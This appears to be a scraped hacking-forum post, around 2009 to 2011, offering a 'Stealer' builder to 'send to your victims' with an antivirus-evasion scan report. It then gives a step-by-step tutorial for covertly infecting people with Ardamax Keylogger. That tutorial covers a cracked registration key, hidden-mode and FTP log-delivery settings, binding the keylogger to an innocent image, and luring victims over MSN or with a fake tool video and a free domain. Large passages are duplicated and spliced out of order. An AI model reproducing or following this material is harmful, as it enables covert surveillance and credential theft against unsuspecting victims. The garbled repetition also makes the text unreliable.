Put the HH.exe and Builder.exe in the same folder.
Open builder.exe and fill in your information
click "Create Stealer!" and send the HH.exe to your victims.
Scan Report:
File Info
Report generated: 11.9.2009 at 19.12.03 (GMT 1)Filename: Project1.exe
File size: 24 KB
MD5 Hash: b4c73decf85c84c2873222d1e308fc3d
SHA1 Hash: 455B434FC2112A521E0385F752FF9AE5E5820833
Self-Extract Archive: Nothing found
Binder Detector: Nothing found
Detection rate: 0 on 23
Detections
a-squared - -
Avira AntiVir - -
Avast - -
AVG - -
BitDefender - -
ClamAV - -
Comodo - -
Dr.Web - -
Ewido - -
F-PROT6 - -
Ikarus T3 - -
Kaspersky - -
McAfee - -
NOD32 v3 - -
Norman - -
Panda - -
QuickHeal - -
Solo Antivirus - -
Sophos - -
TrendMicro - -
VBA32 - -
VirusBuster - -
ZonerAntivirus - -
Scan report generated by : NoVirusThanks.org
DOWNLOAD: http://sharecash.org/download.php?file=517791
Tutorial : Ardamax 2.8 + 2.9 (Includes Reg Key + Binding Tool)
Ok, Ardamax Keylogger 2.9 is good, but not as good as Ardamax Keylogger 2.8, reason being is because on Ardamax Keylogger 2.9, when your victim clicks the file, it comes up saying "This will install Ardamax monitoring tool, do you wish to continue?", where as if you use Ardamax 2.8, it will just infect they're PC when they click it, nothing comes up, it'll just auto-install.
1. Getting Ardamax and Registering it.
1. get Ardamax 2.8 or 2.9 (I HIGHLY recommend 2.8):
Ardamax Keylogger 2.8
Code:
http://rapidshare.com/files/111009363/setup_akl.exe.html
1. get Ardamax 2.8 or 2.9 (I HIGHLY recommend 2.8):
Ardamax Keylogger 2.8
Code:
http://rapidshare.com/files/111009363/setup_akl.exe.html
Ardamax Keylogger 2.9
Code:
http://www.ardamax.com/downloads/setup_akl.exe
Code:
http://www.ardamax.com/downloads/setup_akl.exe
2. once downloaded, you'll see a little note-pad icon in your desk-top icon bar thing (bottom right of your screen), now right-hand click it and click 'Enter registration key...', now type in this where it says registration name and under it where it says registration key:
Code:
Name: Membros
Key: CKPIUQDMITNVNRI
Once done click 'Ok' and you should get a pop-up saying 'Registration key accepted. Thanks for registering'
2. Creating the Keylogger Engine.
1. Now your going to make the Keylogger Engine (The thing you send out over msn or whatever). Click 'Remote Installation...', now, click 'next' until you get to Appearences (it might come up straight away for Ardamax 2.9, but I can't be asked checking).
2. now your at Appearences, click 'Additional components:' and un-tick 'Log Viewer' like done in the screenie:
Code:
Name: Membros
Key: CKPIUQDMITNVNRI
Once done click 'Ok' and you should get a pop-up saying 'Registration key accepted. Thanks for registering'
2. Creating the Keylogger Engine.
1. Now your going to make the Keylogger Engine (The thing you send out over msn or whatever). Click 'Remote Installation...', now, click 'next' until you get to Appearences (it might come up straight away for Ardamax 2.9, but I can't be asked checking).
2. now your at Appearences, click 'Additional components:' and un-tick 'Log Viewer' like done in the screenie:
then click 'Next'.
3. now you should be at 'Invisibility', make sure all the boxes are ticked, then click 'Next'.
4. Now you should be at 'Security', now, click 'Enable' and put your password (it can be any password you like, make it something easy so you can remember). Once done, make sure all the boxes are ticked and click 'Next'.
5. Now you should be at 'Web Update', just click 'Next' when your here.
6. Ok, you should now be at 'Options', this all depends on you, if you want your Keylogger to be a secret on your computer so your family know you ain't been up to anything naughty, then tick 'Start in hidden mode' and click 'Next'
(Remember, if in future you want to make a new Keylogger Engine, then press: CTRL + SHIFT + ALT + H at the same time.
7. Ok, now you should be at 'Control', click the box that says 'Send logs every', now make it so it sends logs every 30 minutes, then where it says Delivery, un-tick 'Email' and tick 'FTP', leave the 'Include' bit as it is, now un-tick the box where it says 'Send only if log size exceeds', once thats done, it should all look like it does in this screenie:
8. Now you should be at 'FTP', ok, creat a free account at
Code:
http://www.DriveHQ.com
, then make sure your at 'Online Storage', then make a new folder called: Logs
(this is where the logs are sent to when you keylogg someone)
Now on your FTP on Ardamax Keylogger, where it says 'FTP Host:', put this: ftp.drivehq.com
Now where it says 'Remote Folder:', put this: Logs
Now where it says 'Userame:' and 'Password:', put your DriveHQ username and password.
Once done, do NOT change your DriveHQ password or rename/delete the folder called 'Logs', if you do, the logs will not come through.
9. You should now be at 'Control', make sure all the boxes are 'ticked' then click 'Next'.
10. Where it says 'Screen Shots', adjust them as you like, but I recommend every 2 hours and full screen, once done click 'Next'.
11. Now you should be at 'Destination', now you have to choose where you put your Keylogger Engine, where it says 'Keylogger egine path:', click 'browse' and choose where you want to put your Keylogger Engine (I suggest 'My Documents').
Now un-tick 'Open the folder containing the keylogger engine' (this should stop you from logging yourself) and then choose the Icon you want for the keylogger engine, choose one and then click 'Next' then 'Finish'.
Watch the video on how to do all this
Code:
http://www.youtube.com/watch?v=84qNWuICm5A
9. You should now be at 'Control', make sure all the boxes are 'ticked' then click 'Next'.
10. Where it says 'Screen Shots', adjust them as you like, but I recommend every 2 hours and full screen, once done click 'Next'.
11. Now you should be at 'Destination', now you have to choose where you put your Keylogger Engine, where it says 'Keylogger egine path:', click 'browse' and choose where you want to put your Keylogger Engine (I suggest 'My Documents').
Now un-tick 'Open the folder containing the keylogger engine' (this should stop you from logging yourself) and then choose the Icon you want for the keylogger engine, choose one and then click 'Next' then 'Finish'.
Watch the video on how to do all this
Code:
http://www.youtube.com/watch?v=84qNWuICm5A
3. Binding the Keylogger Engine with another file.
1. Download the Binding Tool:
Easy Binder 2.0
Code:
http://rapidshare.com/files/105233655/Easy_Binder.zip.html
1. Download the Binding Tool:
Easy Binder 2.0
Code:
http://rapidshare.com/files/105233655/Easy_Binder.zip.html
2. Open it and then click the little green '+' image in the bottom left corner, then it should browse your files, go to 'My Documents' (or where-ever you put the Keylogger Engine) and then click the file called 'Install'.
3. Do the same again but don't add the Keylogger Engine (Install), add a picture or something.
4. You need to get a .ico image, this is easy, just go to
Code:
http://www.chami.com/html-kit/services/favicon/
and upload the Image you want to be converted to .ico, once its done, click 'download'.
5. On the Binder, click 'Settings' and then where it says 'Select An Icon', click the '...' image and then browse your files, where it says 'Files of type', scroll down and select 'All Files [*.*]', then select your .ico image which you just made like so;

6. Now on the Easy Binder, where it says 'Set Output File', click the '...' button and then put it where you want your binded files to be saved (I recommend My Documents so you don't forget), put the name you want on the file and then click 'Save'.
7. Go to 'File's' on the Binder and then click 'Bind File's'. Now this new file you've just made is the keylogger and a image in one, if your doing this with Ardamax 2.8 then when your victim opens the file, a harmless image comes up and they're PC also gets infected with Ardamax Keylogger. If your using Ardamax Keylogger 2.9, when your victim opens the file, the image will come up and a note will come up saying 'This will install Ardamax Monitoring Tool, do you wish to continue?', if they select 'Yes' then they're pc gets infected.
Watch a video on how to do all this
Code:
http://www.youtube.com/watch?v=gqStNeVnrLg
4. Sending the Keylogger file out.
1. Go to the file in in your Documents (or where ever you saved it).
2. Right hand click it and then click 'Send To', then click 'Compressed (zipped) Folder'.
3. Send the 'Zipped' file to someone on msn, once they've extracted it + opened it, they'll be keylogged, etc.
4. If this is no good for you, then I have a helpful suggestion, download Hypercam 2
Code:
http://www.hyperionics.com/downloads/HC2Setup.exe
use Easy Binder 2.0 to bind your Keylogger Engine with like a good tool such as DOB Bruter (can be found on Voide), then zip it then upload your zipped file on
Code:
http://www.rapidshare.com/
then once its uploaded, it'll give you a link to it, you need that link so keep it up, then sign up for a free domain somewhere, I suggest
Code:
www.uk.tt
or
Code:
www.co.nr
3. Do the same again but don't add the Keylogger Engine (Install), add a picture or something.
4. You need to get a .ico image, this is easy, just go to
Code:
http://www.chami.com/html-kit/services/favicon/
and upload the Image you want to be converted to .ico, once its done, click 'download'.
5. On the Binder, click 'Settings' and then where it says 'Select An Icon', click the '...' image and then browse your files, where it says 'Files of type', scroll down and select 'All Files [*.*]', then select your .ico image which you just made like so;
6. Now on the Easy Binder, where it says 'Set Output File', click the '...' button and then put it where you want your binded files to be saved (I recommend My Documents so you don't forget), put the name you want on the file and then click 'Save'.
7. Go to 'File's' on the Binder and then click 'Bind File's'. Now this new file you've just made is the keylogger and a image in one, if your doing this with Ardamax 2.8 then when your victim opens the file, a harmless image comes up and they're PC also gets infected with Ardamax Keylogger. If your using Ardamax Keylogger 2.9, when your victim opens the file, the image will come up and a note will come up saying 'This will install Ardamax Monitoring Tool, do you wish to continue?', if they select 'Yes' then they're pc gets infected.
Watch a video on how to do all this
Code:
http://www.youtube.com/watch?v=gqStNeVnrLg
4. Sending the Keylogger file out.
1. Go to the file in in your Documents (or where ever you saved it).
2. Right hand click it and then click 'Send To', then click 'Compressed (zipped) Folder'.
3. Send the 'Zipped' file to someone on msn, once they've extracted it + opened it, they'll be keylogged, etc.
4. If this is no good for you, then I have a helpful suggestion, download Hypercam 2
Code:
http://www.hyperionics.com/downloads/HC2Setup.exe
use Easy Binder 2.0 to bind your Keylogger Engine with like a good tool such as DOB Bruter (can be found on Voide), then zip it then upload your zipped file on
Code:
http://www.rapidshare.com/
then once its uploaded, it'll give you a link to it, you need that link so keep it up, then sign up for a free domain somewhere, I suggest
Code:
www.uk.tt
or
Code:
www.co.nr
once done, make it so the domain points to the RapidShare url (the url that goes to your zipped file that you uploaded on RapidShare).
Now open Notepad and make the font size 48. Run HyperCam 2, click 'Select Region', make the box you want to record then press 'F2' and it will start recording, now open DOB Bruter or whatever and show them how good it is, etc, then open the notepad saying 'Go to (your free domain you made at
Code:
www.uk.tt
or
Code:
www.co.nr
to get this tool', they download, you've keylogged them, its a very simple day.
Now open Notepad and make the font size 48. Run HyperCam 2, click 'Select Region', make the box you want to record then press 'F2' and it will start recording, now open DOB Bruter or whatever and show them how good it is, etc, then open the notepad saying 'Go to (your free domain you made at
Code:
www.uk.tt
or
Code:
www.co.nr
to get this tool', they download, you've keylogged them, its a very simple day.
Subscribe to:
Posts (Atom)
Tuesday, December 27, 2011
Anu




















